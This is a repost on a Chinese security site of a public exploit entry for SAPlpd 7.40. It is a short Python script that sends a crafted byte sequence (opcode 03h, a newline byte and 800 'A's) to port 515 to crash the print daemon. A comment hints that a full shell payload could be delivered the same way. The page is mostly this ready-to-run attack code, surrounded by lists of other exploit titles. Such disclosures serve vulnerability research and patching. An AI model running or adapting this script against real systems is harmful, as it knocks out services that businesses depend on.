首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SapLPD 7.4.0 Denial Of Service
来源:http://saptech-erp.com.au 作者:Baris 发布时间:2017-01-16  
# Exploit Title: SAPlpd 7.40 Denial of Service
# Date: 2016-12-28
# Exploit Author: Peter Baris
# Exploit code: http://saptech-erp.com.au/resources/saplpd_dos.zip
# Version: 7.40 all patch levels (as a part of SAPGui 7.40)  
# Tested on: Windows Server 2008 R2 x64, Windows 7 Pro x64
 
 
import socket
 
# Opcodes 03h and 04h are vulnerable to bad characters 00h and 0ah
# So you can modify the DoS accordingly
# The added 800 A's are just to show, that you can deliver a complete shell with the command
 
DoS = ("\x03"+"\x0a"+"\x41"*800)
 
 
s = socket.socket()
s.settimeout(1)
s.connect(('192.168.198.132', 515))
print("[*] Crashing SAPlpd 7.40")
print("[*] Payload length: "+str(len(DoS))+" bytes")
s.send(DoS)
s.close()



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mozilla Firefox < 50.1.0 - Use
·DiskBoss Enterprise GET Buffer
·iTechscripts Freelancer Script
·Apple iTunes Notify Script Ins
·Cisco Firepower Management Con
·PHP LibGD Heap Buffer Overflow
·Firejail - Privilege Escalatio
·WinaXe Plus 8.7 - Buffer Overf
·Cemu 1.6.4b - Information Leak
·iSelect v1.4 - Local Buffer Ov
·Microsoft Windows 8.1 (x64) -
·Pirelli DRG A115 ADSL Router -
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved